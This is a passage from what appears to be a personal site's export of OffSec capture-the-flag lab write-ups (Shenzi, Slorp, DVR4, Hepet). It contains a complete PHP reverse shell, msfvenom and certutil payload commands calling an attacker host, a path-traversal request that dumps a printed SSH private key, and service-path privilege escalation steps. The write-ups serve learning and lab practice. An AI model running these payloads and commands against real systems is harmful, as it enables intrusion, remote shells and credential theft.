----- $socket = @fsockopen($this-\u0026gt;addr, $this-\u0026gt;port, $errno, $errstr, 30); if (!$socket) { echo \u0026#34;SOC_ERROR: {$errno}: {$errstr}\\n\u0026#34;; } else { stream_set_blocking($socket, false); // set the socket stream to non-blocking mode | returns \u0026#39;true\u0026#39; on Windows OS // ----- SHELL BEGIN ----- $process = @proc_open($this-\u0026gt;shell, $this-\u0026gt;descriptorspec, $pipes, null, null); if (!$process) { echo \u0026#34;PROC_ERROR: Cannot start the shell\\n\u0026#34;; } else { foreach ($pipes as $pipe) { stream_set_blocking($pipe, false); // set the shell streams to non-blocking mode | returns \u0026#39;false\u0026#39; on Windows OS } // ----- WORK BEGIN ----- $status = proc_get_status($process); @fwrite($socket, \u0026#34;SOCKET: Shell has connected! PID: \u0026#34; . $status[\u0026#39;pid\u0026#39;] . \u0026#34;\\n\u0026#34;); do { $status = proc_get_status($process); if (feof($socket)) { // check for end-of-file on SOCKET echo \u0026#34;SOC_ERROR: Shell connection has been terminated\\n\u0026#34;; break; } else if (feof($pipes[1]) || !$status[\u0026#39;running\u0026#39;]) { // check for end-of-file on STDOUT or if process is still running echo \u0026#34;PROC_ERROR: Shell process has been terminated\\n\u0026#34;; break; // feof() does not work with blocking streams } // use proc_get_status() instead $streams = array( \u0026#39;read\u0026#39; =\u0026gt; array($socket, $pipes[1], $pipes[2]), // SOCKET | STDOUT | STDERR \u0026#39;write\u0026#39; =\u0026gt; null, \u0026#39;except\u0026#39; =\u0026gt; null ); $num_changed_streams = @stream_select($streams[\u0026#39;read\u0026#39;], $streams[\u0026#39;write\u0026#39;], $streams[\u0026#39;except\u0026#39;], 0); // wait for stream changes | will not wait on Windows OS if ($num_changed_streams === false) { echo \u0026#34;STRM_ERROR: stream_select() failed\\n\u0026#34;; break; } else if ($num_changed_streams \u0026gt; 0) { if ($this-\u0026gt;os === \u0026#39;LINUX\u0026#39;) { if (in_array($socket , $streams[\u0026#39;read\u0026#39;])) { $this-\u0026gt;rw($socket , $pipes[0], \u0026#39;SOCKET\u0026#39;, \u0026#39;STDIN\u0026#39; ); } // read from SOCKET and write to STDIN if (in_array($pipes[2], $streams[\u0026#39;read\u0026#39;])) { $this-\u0026gt;rw($pipes[2], $socket , \u0026#39;STDERR\u0026#39;, \u0026#39;SOCKET\u0026#39;); } // read from STDERR and write to SOCKET if (in_array($pipes[1], $streams[\u0026#39;read\u0026#39;])) { $this-\u0026gt;rw($pipes[1], $socket , \u0026#39;STDOUT\u0026#39;, \u0026#39;SOCKET\u0026#39;); } // read from STDOUT and write to SOCKET } else if ($this-\u0026gt;os === \u0026#39;WINDOWS\u0026#39;) { // order is important if (in_array($socket, $streams[\u0026#39;read\u0026#39;])/*------*/) { $this-\u0026gt;rw ($socket , $pipes[0], \u0026#39;SOCKET\u0026#39;, \u0026#39;STDIN\u0026#39; ); } // read from SOCKET and write to STDIN if (($fstat = fstat($pipes[2])) \u0026amp;\u0026amp; $fstat[\u0026#39;size\u0026#39;]) { $this-\u0026gt;brw($pipes[2], $socket , \u0026#39;STDERR\u0026#39;, \u0026#39;SOCKET\u0026#39;); } // read from STDERR and write to SOCKET if (($fstat = fstat($pipes[1])) \u0026amp;\u0026amp; $fstat[\u0026#39;size\u0026#39;]) { $this-\u0026gt;brw($pipes[1], $socket , \u0026#39;STDOUT\u0026#39;, \u0026#39;SOCKET\u0026#39;); } // read from STDOUT and write to SOCKET } } } while (!$this-\u0026gt;error); // ------ WORK END ------ foreach ($pipes as $pipe) { fclose($pipe); } proc_close($process); } // ------ SHELL END ------ fclose($socket); } // ------ SOCKET END ------ } } } echo \u0026#39;\u0026lt;pre\u0026gt;\u0026#39;; // change the host address and/or port number as necessary $sh = new Shell(\u0026#39;192.168.45.159\u0026#39;, 4444); $sh-\u0026gt;run(); unset($sh); // garbage collector requires PHP v5.3.0 or greater // @gc_collect_cycles(); echo \u0026#39;\u0026lt;/pre\u0026gt;\u0026#39;; ?\u0026gt; on clicking update we get a shell lol\nnow on uploading powerup we see alwaysinstallelevated can be abused so lets abuse it\nmsfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.159 LPORT=6969 -a x64 --platform Windows -f msi -o rev.msi certutil -urlcache -f http://192.168.45.199/rev.msi rev.msi and then\nmsiexec /i C:\\\\Users\\\\shenzi\\\\Desktop\\\\rev.msi /qn ","date":"2 April 2026","externalUrl":null,"permalink":"/ctf-writeups/shenzi/","section":"CTF Writeups","summary":"","title":"Shenzi","type":"ctf-writeups"},{"content":" Slorp # Overview # OS: Windows IP: 192.168.117.53 Difficulty: Intermediate Platform: OffSec OSCP: Yes Lists: N/A Summary # Initial Access with RFI and privesc with scheduled task.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # └─$ nmap -p- 192.168.117.53 -Pn -sCV -A --min-rate=20000 Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-02 10:15 EDT Warning: 192.168.117.53 giving up on port because retransmission cap hit (10). Nmap scan report for 192.168.117.53 Host is up (0.084s latency). Not shown: 65506 closed tcp ports (reset) PORT STATE SERVICE VERSION 21/tcp open ftp FileZilla ftpd 0.9.41 beta | ftp-syst: |_ SYST: UNIX emulated by FileZilla 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 220/tcp filtered imap3 445/tcp open microsoft-ds? 3306/tcp open mysql MariaDB 10.3.24 or later (unauthorized) 3921/tcp filtered herodotus-net 4443/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6) | http-title: Welcome to XAMPP |_Requested resource was http://192.168.117.53:4443/dashboard/ |_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6 5040/tcp open unknown 7680/tcp open pando-pub? 7918/tcp filtered unknown 8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6) |_http-open-proxy: Proxy might be redirecting requests | http-title: Welcome to XAMPP |_Requested resource was http://192.168.117.53:8080/dashboard/ |_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6 21372/tcp filtered unknown 22306/tcp filtered unknown 24334/tcp filtered unknown 29118/tcp filtered unknown 30096/tcp filtered unknown 31763/tcp filtered unknown 33518/tcp filtered unknown 42544/tcp filtered unknown 43261/tcp filtered unknown 46575/tcp filtered unknown 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC Dirbusting # shows site index.php Port 80 # Web behavior was the main signal here, so I traced each response change before exploitation.\nwe find this\nExploitation # so the parameter turned out to be susceptible to lfi\nwe find this in the backup folder\nseems to be running TFTP.EXE lets replace it with our rev shell\nmsfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.177 LPORT=593 -f exe \u0026gt; reverse.exe now we wait\n","date":"2 April 2026","externalUrl":null,"permalink":"/ctf-writeups/slorp/","section":"CTF Writeups","summary":"","title":"Slorp","type":"ctf-writeups"},{"content":" DVR4 # Overview # OS: Windows IP: 192.168.139.179 Difficulty: Hard Platform: OffSec OSCP: Yes Lists: N/A Summary # path traversal gave ssh creds privesc w weak password.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # Bitvise WinSSHD 8.48\nPORT STATE SERVICE VERSION 22/tcp open ssh Bitvise WinSSHD 8.48 (FlowSsh 8.48; protocol 2.0; non-commercial use) | ssh-hostkey: | 3072 21:25:f0:53:b4:99:0f:34:de:2d:ca:bc:5d:fe:20:ce (RSA) |_ 384 e7:96:f3:6a:d8:92:07:5a:bf:37:06:86:0a:31:73:19 (ECDSA) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 5040/tcp open unknown 7680/tcp open pando-pub? 8080/tcp open http-proxy |_http-generator: Actual Drawing 6.0 (http://www.pysoft.com) [PYSOFTWARE] |_http-title: Argus Surveillance DVR | fingerprint-strings: | GetRequest, HTTPOptions: | HTTP/1.1 200 OK | Connection: Keep-Alive | Keep-Alive: timeout=15, max=4 | Content-Type: text/html | Content-Length: 985 | \u0026lt;HTML\u0026gt; | \u0026lt;HEAD\u0026gt; | \u0026lt;TITLE\u0026gt; | Argus Surveillance DVR | \u0026lt;/TITLE\u0026gt; | \u0026lt;meta http-equiv=\u0026#34;Content-Type\u0026#34; content=\u0026#34;text/html; charset=ISO-8859-1\u0026#34;\u0026gt; | \u0026lt;meta name=\u0026#34;GENERATOR\u0026#34; content=\u0026#34;Actual Drawing 6.0 (http://www.pysoft.com) [PYSOFTWARE]\u0026#34;\u0026gt; | \u0026lt;frameset frameborder=\u0026#34;no\u0026#34; border=\u0026#34;0\u0026#34; rows=\u0026#34;75,*,88\u0026#34;\u0026gt; | \u0026lt;frame name=\u0026#34;Top\u0026#34; frameborder=\u0026#34;0\u0026#34; scrolling=\u0026#34;auto\u0026#34; noresize src=\u0026#34;CamerasTopFrame.html\u0026#34; marginwidth=\u0026#34;0\u0026#34; marginheight=\u0026#34;0\u0026#34;\u0026gt; | \u0026lt;frame name=\u0026#34;ActiveXFrame\u0026#34; frameborder=\u0026#34;0\u0026#34; scrolling=\u0026#34;auto\u0026#34; noresize src=\u0026#34;ActiveXIFrame.html\u0026#34; marginwidth=\u0026#34;0\u0026#34; marginheight=\u0026#34;0\u0026#34;\u0026gt; | \u0026lt;frame name=\u0026#34;CamerasTable\u0026#34; frameborder=\u0026#34;0\u0026#34; scrolling=\u0026#34;auto\u0026#34; noresize src=\u0026#34;CamerasBottomFrame.html\u0026#34; marginwidth=\u0026#34;0\u0026#34; marginheight=\u0026#34;0\u0026#34;\u0026gt; | \u0026lt;noframes\u0026gt; | \u0026lt;p\u0026gt;This page uses frames, but your browser doesn\u0026#39;t support them.\u0026lt;/p\u0026gt; |_ \u0026lt;/noframes\u0026gt; 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port8080-TCP:V=7.95%I=7%D=4/1%Time=69CD163B%P=x86_64-pc-linux-gnu%r(Get SF:Request,451,\u0026#34;HTTP/1\\.1\\x20200\\x20OK\\r\\nConnection:\\x20Keep-Alive\\r\\nKee SF:p-Alive:\\x20timeout=15,\\x20max=4\\r\\nContent-Type:\\x20text/html\\r\\nConte SF:nt-Length:\\x20985\\r\\n\\r\\n\u0026lt;HTML\u0026gt;\\r\\n\u0026lt;HEAD\u0026gt;\\r\\n\u0026lt;TITLE\u0026gt;\\r\\nArgus\\x20Survei SF:llance\\x20DVR\\r\\n\u0026lt;/TITLE\u0026gt;\\r\\n\\r\\n\u0026lt;meta\\x20http-equiv=\\\u0026#34;Content-Type\\\u0026#34;\\x SF:20content=\\\u0026#34;text/html;\\x20charset=ISO-8859-1\\\u0026#34;\u0026gt;\\r\\n\u0026lt;meta\\x20name=\\\u0026#34;GENE SF:RATOR\\\u0026#34;\\x20content=\\\u0026#34;Actual\\x20Drawing\\x206\\.0\\x20\\(http://www\\.pysoft\\ SF:.com\\)\\x20\\[PYSOFTWARE\\]\\\u0026#34;\u0026gt;\\r\\n\\r\\n\u0026lt;frameset\\x20frameborder=\\\u0026#34;no\\\u0026#34;\\x20b SF:order=\\\u0026#34;0\\\u0026#34;\\x20rows=\\\u0026#34;75,\\*,88\\\u0026#34;\u0026gt;\\r\\n\\x20\\x20\u0026lt;frame\\x20name=\\\u0026#34;Top\\\u0026#34;\\x20 SF:frameborder=\\\u0026#34;0\\\u0026#34;\\x20scrolling=\\\u0026#34;auto\\\u0026#34;\\x20noresize\\x20src=\\\u0026#34;CamerasTop SF:Frame\\.html\\\u0026#34;\\x20marginwidth=\\\u0026#34;0\\\u0026#34;\\x20marginheight=\\\u0026#34;0\\\u0026#34;\u0026gt;\\x20\\x20\\r\\n\\x SF:20\\x20\u0026lt;frame\\x20name=\\\u0026#34;ActiveXFrame\\\u0026#34;\\x20frameborder=\\\u0026#34;0\\\u0026#34;\\x20scrolling SF:=\\\u0026#34;auto\\\u0026#34;\\x20noresize\\x20src=\\\u0026#34;ActiveXIFrame\\.html\\\u0026#34;\\x20marginwidth=\\\u0026#34;0 SF:\\\u0026#34;\\x20marginheight=\\\u0026#34;0\\\u0026#34;\u0026gt;\\r\\n\\x20\\x20\u0026lt;frame\\x20name=\\\u0026#34;CamerasTable\\\u0026#34;\\x2 SF:0frameborder=\\\u0026#34;0\\\u0026#34;\\x20scrolling=\\\u0026#34;auto\\\u0026#34;\\x20noresize\\x20src=\\\u0026#34;CamerasBo SF:ttomFrame\\.html\\\u0026#34;\\x20marginwidth=\\\u0026#34;0\\\u0026#34;\\x20marginheight=\\\u0026#34;0\\\u0026#34;\u0026gt;\\x20\\x20\\r SF:\\n\\x20\\x20\u0026lt;noframes\u0026gt;\\r\\n\\x20\\x20\\x20\\x20\u0026lt;p\u0026gt;This\\x20page\\x20uses\\x20fram SF:es,\\x20but\\x20your\\x20browser\\x20doesn\u0026#39;t\\x20support\\x20them\\.\u0026lt;/p\u0026gt;\\r\\n\\x SF:20\\x20\u0026lt;/noframes\u0026gt;\\r\u0026#34;)%r(HTTPOptions,451,\u0026#34;HTTP/1\\.1\\x20200\\x20OK\\r\\nConn SF:ection:\\x20Keep-Alive\\r\\nKeep-Alive:\\x20timeout=15,\\x20max=4\\r\\nContent SF:-Type:\\x20text/html\\r\\nContent-Length:\\x20985\\r\\n\\r\\n\u0026lt;HTML\u0026gt;\\r\\n\u0026lt;HEAD\u0026gt;\\r SF:\\n\u0026lt;TITLE\u0026gt;\\r\\nArgus\\x20Surveillance\\x20DVR\\r\\n\u0026lt;/TITLE\u0026gt;\\r\\n\\r\\n\u0026lt;meta\\x20h SF:ttp-equiv=\\\u0026#34;Content-Type\\\u0026#34;\\x20content=\\\u0026#34;text/html;\\x20charset=ISO-8859- SF:1\\\u0026#34;\u0026gt;\\r\\n\u0026lt;meta\\x20name=\\\u0026#34;GENERATOR\\\u0026#34;\\x20content=\\\u0026#34;Actual\\x20Drawing\\x206 SF:\\.0\\x20\\(http://www\\.pysoft\\.com\\)\\x20\\[PYSOFTWARE\\]\\\u0026#34;\u0026gt;\\r\\n\\r\\n\u0026lt;framese SF:t\\x20frameborder=\\\u0026#34;no\\\u0026#34;\\x20border=\\\u0026#34;0\\\u0026#34;\\x20rows=\\\u0026#34;75,\\*,88\\\u0026#34;\u0026gt;\\r\\n\\x20\\x SF:20\u0026lt;frame\\x20name=\\\u0026#34;Top\\\u0026#34;\\x20frameborder=\\\u0026#34;0\\\u0026#34;\\x20scrolling=\\\u0026#34;auto\\\u0026#34;\\x20 SF:noresize\\x20src=\\\u0026#34;CamerasTopFrame\\.html\\\u0026#34;\\x20marginwidth=\\\u0026#34;0\\\u0026#34;\\x20margi SF:nheight=\\\u0026#34;0\\\u0026#34;\u0026gt;\\x20\\x20\\r\\n\\x20\\x20\u0026lt;frame\\x20name=\\\u0026#34;ActiveXFrame\\\u0026#34;\\x20fr SF:ameborder=\\\u0026#34;0\\\u0026#34;\\x20scrolling=\\\u0026#34;auto\\\u0026#34;\\x20noresize\\x20src=\\\u0026#34;ActiveXIFram SF:e\\.html\\\u0026#34;\\x20marginwidth=\\\u0026#34;0\\\u0026#34;\\x20marginheight=\\\u0026#34;0\\\u0026#34;\u0026gt;\\r\\n\\x20\\x20\u0026lt;frame SF:\\x20name=\\\u0026#34;CamerasTable\\\u0026#34;\\x20frameborder=\\\u0026#34;0\\\u0026#34;\\x20scrolling=\\\u0026#34;auto\\\u0026#34;\\x2 SF:0noresize\\x20src=\\\u0026#34;CamerasBottomFrame\\.html\\\u0026#34;\\x20marginwidth=\\\u0026#34;0\\\u0026#34;\\x20m SF:arginheight=\\\u0026#34;0\\\u0026#34;\u0026gt;\\x20\\x20\\r\\n\\x20\\x20\u0026lt;noframes\u0026gt;\\r\\n\\x20\\x20\\x20\\x20\u0026lt;p\u0026gt; SF:This\\x20page\\x20uses\\x20frames,\\x20but\\x20your\\x20browser\\x20doesn\u0026#39;t\\x2 SF:0support\\x20them\\.\u0026lt;/p\u0026gt;\\r\\n\\x20\\x20\u0026lt;/noframes\u0026gt;\\r\u0026#34;); No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: Network Distance: 4 hops Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2026-04-01T13:00:30 |_ start_date: N/A | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required TRACEROUTE (using port 111/tcp) HOP RTT ADDRESS 1 82.10 ms 192.168.45.1 2 82.04 ms 192.168.45.254 3 82.11 ms 192.168.251.1 4 82.17 ms 192.168.139.179 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 234.93 seconds Dirbusting # Port 8080 # Web behavior was the main signal here, so I traced each response change before exploitation.\nExploitation # lets use the directory traversal exploit\ncurl \u0026#34;http://192.168.139.179:8080/WEBACCOUNT.CGI?OkBtn=++Ok++\u0026amp;RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini\u0026amp;USEREDIRECT=1\u0026amp;WEBACCOUNTID=\u0026amp;WEBACCOUNTPASSWORD=\u0026#34; ok im guessing the route is to grab the users sshj key thru this vuln because ssh is normally never open on a windows machine so lets identify the users first\ncurl \u0026#34;http://192.168.139.179:8080/WEBACCOUNT.CGI?OkBtn=++Ok++\u0026amp;RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FUsers%2FViewer%2F.ssh%2Fid_rsa\u0026amp;USEREDIRECT=1\u0026amp;WEBACCOUNTID=\u0026amp;WEBACCOUNTPASSWORD=\u0026gt;\u0026#34; -----BEGIN OPENSSH PRIVATE KEY----- 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 -----END OPENSSH PRIVATE KEY----- we find the key in the users folder\nlets get in now\nchmod 600 and ssh ipaddr -i id_rsa\nthere was a weak password encryption script we saw earlier using that we can decrypt the password stored in\nNote: Argus Surveillance DVR 4.0 configuration is present in ## C:\\\\ProgramData\\\\PY_Software\\\\Argus Surveillance DVR\\\\DVRParams.ini and cracking that gives us the password as 14WatchD0g$\n","date":"1 April 2026","externalUrl":null,"permalink":"/ctf-writeups/dvr4/","section":"CTF Writeups","summary":"","title":"DVR4","type":"ctf-writeups"},{"content":" Hepet # Overview # OS: Windows IP: 192.168.139.140 Difficulty: Hard Platform: OffSec OSCP: Yes Lists: N/A Summary # Initial access with email macro and privesc with PowerUp.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # 25/tcp open smtp Mercury/32 smtpd (Mail server account Maiser) |_smtp-commands: localhost Hello nmap.scanme.org; ESMTPs are:, TIME 79/tcp open finger Mercury/32 fingerd | finger: Login: Admin Name: Mail System Administrator\\x0D | \\x0D |_[No profile information]\\x0D 105/tcp open ph-addressbook Mercury/32 PH addressbook server 106/tcp open pop3pw Mercury/32 poppass service 110/tcp open pop3 Mercury Mail Transport System pop3d |_pop3-capabilities: TOP EXPIRE(NEVER) UIDL APOP USER 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 143/tcp open imap Mercury/32 imapd 4.62 |_imap-capabilities: X-MERCURY-1A0001 AUTH=PLAIN CAPABILITY OK complete IMAP4rev1 443/tcp open ssl/http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.3.23) |_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.3.23 | ssl-cert: Subject: commonName=localhost | Not valid before: 2009-11-10T23:48:47 |_Not valid after: 2019-11-08T23:48:47 |_http-title: Time Travel Company Page |_ssl-date: TLS randomness does not represent time | http-methods: |_ Potentially risky methods: TRACE | tls-alpn: |_ http/1.1 445/tcp open microsoft-ds? 2224/tcp open http Mercury/32 httpd |_http-title: Mercury HTTP Services 5040/tcp open unknown 8000/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.3.23) |_http-title: Time Travel Company Page | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.3.23 11100/tcp open vnc VNC (protocol 3.8) | vnc-info: | Protocol version: 3.8 | Security types: |_ Unknown security type (40) 20001/tcp open ftp FileZilla ftpd 0.9.41 beta |_ftp-bounce: bounce working! | ftp-anon: Anonymous FTP login allowed (FTP code 230) | -r--r--r-- 1 ftp ftp 312 Oct 20 2020 .babelrc | -r--r--r-- 1 ftp ftp 147 Oct 20 2020 .editorconfig | -r--r--r-- 1 ftp ftp 23 Oct 20 2020 .eslintignore | -r--r--r-- 1 ftp ftp 779 Oct 20 2020 .eslintrc.js | -r--r--r-- 1 ftp ftp 167 Oct 20 2020 .gitignore | -r--r--r-- 1 ftp ftp 228 Oct 20 2020 .postcssrc.js | -r--r--r-- 1 ftp ftp 346 Oct 20 2020 .tern-project | drwxr-xr-x 1 ftp ftp 0 Oct 20 2020 build | drwxr-xr-x 1 ftp ftp 0 Oct 20 2020 config | -r--r--r-- 1 ftp ftp 1376 Oct 20 2020 index.html | -r--r--r-- 1 ftp ftp 425010 Oct 20 2020 package-lock.json | -r--r--r-- 1 ftp ftp 2454 Oct 20 2020 package.json | -r--r--r-- 1 ftp ftp 1100 Oct 20 2020 README.md | drwxr-xr-x 1 ftp ftp 0 Oct 20 2020 src | drwxr-xr-x 1 ftp ftp 0 Oct 20 2020 static |_-r--r--r-- 1 ftp ftp 127 Oct 20 2020 _redirects | ftp-syst: |_ SYST: UNIX emulated by FileZilla 33006/tcp open mysql MariaDB 10.3.24 or later (unauthorized) 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: Network Distance: 4 hops Service Info: Host: localhost; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required | smb2-time: | date: 2026-04-01T13:48:04 |_ start_date: N/A TRACEROUTE (using port 3306/tcp) HOP RTT ADDRESS 1 81.75 ms 192.168.45.1 2 81.71 ms 192.168.45.254 3 82.12 ms 192.168.251.1 4 82.20 ms 192.168.139.140 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 198.58 seconds Dirbusting # Port 8000 # got a list of usernames aswell\nand for some reason i think Jonas has his password out Jonas K. : SicMundusCreatusEst\nVerifying usernames\nsmtp-user-enum -M VRFY -U users.txt -t 192.169.139.140 this gives us agnes magnus charlotte martha and jones as active users\nIMAP # we were able to access the imap server w the creds we found earlier\non reading the mails we see that all the spreadsheets and documents are being processed in the mail server first to check compatibility\nExploitation # github.com/0bfxgh0st/MMG-LO\nlets use this to generate our macro\nmodify accordingly\nand boom we got a connection\nlets modify this service to run our payload\nwe could go this route\nWrite-ServiceBinary -Name \u0026#34;VeyonService\u0026#34; -Path \u0026#34;C:\\Users\\Ela Arwel\\Veyon\\veyon-service.exe\u0026#34; -UserName \u0026#34;hacker\u0026#34; -Password \u0026#34;P@ssw0rd123!\u0026#34; but lets just use the rev.exe\nbecause it is unqoted we r doin this\nBecause there is a space in the path (Ela Arwel) and no quotes, Windows parses it from left to right and tries these possible executables in order: C:\\Users\\Ela.exe ← (unlikely, you probably can\u0026#39;t write here) C:\\Users\\Ela Arwel\\Veyon\\veyon.exe ← This is where you can write! C:\\Users\\Ela Arwel\\Veyon\\veyon-service.exe (the real one) As soon as Windows finds a valid .exe at step 2 (veyon.exe), it runs that one and stops checking. So your malicious veyon.exe gets executed as LocalSystem, and the real veyon-service.exe is completely ignored. copy \u0026#34;C:\\Users\\Public\\Documents\\rev.exe\u0026#34; \u0026#34;C:\\Users\\Ela Arwel\\Veyon\\veyon.exe\u0026#34; -Force OR replace the entire binary\nmove \u0026#34;C:\\Users\\Ela Arwel\\Veyon\\veyon-service.exe\u0026#34; \u0026#34;C:\\Users\\Ela Arwel\\Veyon\\veyon-service.exe.bak\u0026#34; -Force move \u0026#34;C:\\Users\\Public\\Documents\\rev.exe\u0026#34; 